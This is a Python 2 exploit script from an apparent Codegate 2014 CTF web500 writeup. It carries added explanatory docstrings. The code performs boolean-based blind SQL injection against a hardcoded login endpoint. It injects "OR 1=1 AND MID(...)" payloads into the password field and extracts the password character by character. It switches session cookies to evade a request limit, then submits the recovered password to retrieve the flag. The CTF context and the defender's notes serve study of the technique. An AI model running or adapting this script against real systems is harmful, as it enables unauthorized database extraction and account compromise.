- #!/usr/bin/env python
- #Blind SQL injection Exploit version 1.0
- #Language: Python (2.6)
- #Author: gamma95
- import os
- import sys
- import urllib2
- import struct
- import urllib
- import time
# Usage banner; the script expects exactly three positional arguments.
print """
Codegate@2014: web500 writeup
https://twitter.com/xchym
Usage: python web500.py "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php" "password" "mysql"
"""
# argv[0] is the script itself, so len(sys.argv) == 4 means three user arguments.
if len(sys.argv) != 4:
    print "[+] Syntax Error"
    exit()
url = sys.argv[1]        # auth endpoint that receives the injected POST body
sql = sys.argv[2]        # column name spliced into the MID() call by execute()
sqlserver = sys.argv[3]  # only the literal 'mysql' is accepted by execute()
def _gen_new_session():
    """Fetch the index page and return its raw Set-Cookie header value.

    Every call produces a fresh server-side session; execute() pre-builds a
    pool of these so it can switch sessions as it goes. The header lookup
    uses .get(), so the return value is None when no Set-Cookie is present.

    NOTE: the base URL is hardcoded here instead of being derived from the
    `url` argument the script accepts on the command line.
    """
    usock = urllib2.urlopen('http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/')
    _cookie = usock.info().get('Set-Cookie')
    return _cookie
def _get_flag(_session, _password):
    """POST a password to auth.php under an existing session and return the body.

    Parameters:
        _session: raw Cookie header value, as returned by _gen_new_session().
        _password: the password string recovered by execute().
    Returns:
        The response body as a string; the caller prints it as the flag.

    NOTE: the local `url` shadows the module-level `url` read from argv --
    the endpoint below is hardcoded.
    """
    url = 'http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/auth.php'
    user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
    values = {'password':_password}
    headers = { 'User-Agent' : user_agent, 'Cookie': _session }
    data = urllib.urlencode(values)  # form-encoded POST body
    req = urllib2.Request(url, data, headers)
    response = urllib2.urlopen(req)  # no error handling: a failure propagates
    the_page = response.read()
    return the_page
def encodeurl(string):
    """Return *string* with every space replaced by the literal '%20'.

    Only spaces are escaped; no other character is touched. This helper is
    not called anywhere in the visible script.
    """
    pieces = string.split(' ')
    return '%20'.join(pieces)
def execute(url, sql, sqlserver):
    """Recover a column value one character at a time via boolean-based blind SQL injection.

    Parameters:
        url: the auth endpoint that receives the injected 'password' field.
        sql: the column name spliced into MID() (argv[2], e.g. "password").
        sqlserver: must be the literal 'mysql'; anything else aborts.

    How the oracle works: each request submits
    ``123' OR 1=1 AND MID(<sql>,1,<i>)='<prefix><guess>' and '1`` as the
    password. The response contains the text "True" only when the guessed
    prefix matches, so the loop appends one character per hit and moves to
    position i+1. The recovered value is finally posted through _get_flag().

    Defender's view: the oracle exists only because the server concatenates
    the password into its SQL string -- a parameterized query removes it.
    The traffic is distinctive too: up to 30 x len(dic) sequential POSTs
    carrying "OR 1=1 AND MID(" in the body, with a fresh session cookie after
    each confirmed character.

    Quirks worth knowing: `lenght`, `len1` and `flag` are assigned but never
    read; the loop variable `line` is reused for both the session counter and
    the candidate character; the error text mentions argv[4] although the value
    comes from sys.argv[3]; and the bare `except:` also swallows
    KeyboardInterrupt/SystemExit before calling exit().
    """
    _list_session=[]
    # Pool of 40 sessions; `count` below indexes into it, and since at most
    # 30 characters are recovered the index never exceeds 30.
    for line in xrange(0, 40):
        _list_session.append(_gen_new_session())
    lenght = 9999  # unused
    if sqlserver =='mysql':
        str1 = " OR 1=1 AND MID("
    else:
        print "[+] argv[4] = mssql or mysql !!! Plz check your input"
        exit()
    result = ""
    # Candidate alphabet tried, in this order, at every position.
    dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '$', '.','-','_','(',')','[',']','{','}','@','=','/','\\','|','#','?','!','<','>']
    count = 0  # number of characters confirmed so far; also the session index
    check = 0  # set to 1 when a whole alphabet pass finds no match
    for i in range(1, 31):  # position i = prefix length being tested (max 30)
        user_agent = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6'
        kount = 0  # how many candidates tried at this position
        if check == 1:
            break
        for line in dic:
            kount = kount + 1
            flag = 0  # unused
            # Build MID(<sql>,1,<i>)='<result><line>' and close the quote.
            str2 = "," + str(i)+ ")=" + "'" + result + line + "'"
            chuoi = str1 + sql +','+ "1" + str2 + " and '1"
            print chuoi  # every payload is echoed to stdout
            values={'password':"123' "+ chuoi}
            data = urllib.urlencode(values)
            #switch to another session for continue bruteforce searching, if not, may be the password will be deleted (over 120 requests limit check)
            headers = { 'Host': '58.229.183.24','User-Agent': user_agent, 'Referer' : url, 'Cookie': _list_session[count]}
            req = urllib2.Request(url, data, headers)
            try:
                response = urllib2.urlopen(req)
            except:
                # Bare except: any failure, including Ctrl-C, ends the run here.
                print "[+] Connection error"
                exit()
            page = response.read()
            len1 = len(page)  # unused
            if "True" in page:
                # Match: commit the character, move to the next session and position.
                count = count + 1
                result = result + line
                print result
                flag = 1
                break #
            elif kount == len(dic):
                # Alphabet exhausted with no match: the value is complete (or
                # contains a character outside `dic`); stop the outer loop.
                check = 1
                break
            else:
                continue
    print "[+]Done, The password is: " + str(result)
    # Uses the next unused session from the pool for the final login.
    print "[+]Flag: " + _get_flag(_list_session[count], str(result))
- ##############
# Entry point. The condition is the literal True, so the `else` branch
# ("Not vul") is dead code; there is no vulnerability check before execute().
if True:
    print """
[+] Sending Malicious Request
[+] Plz wait ... :)
"""
    execute(url, sql, sqlserver)
else:
    print "Not vul"
    exit()
exit()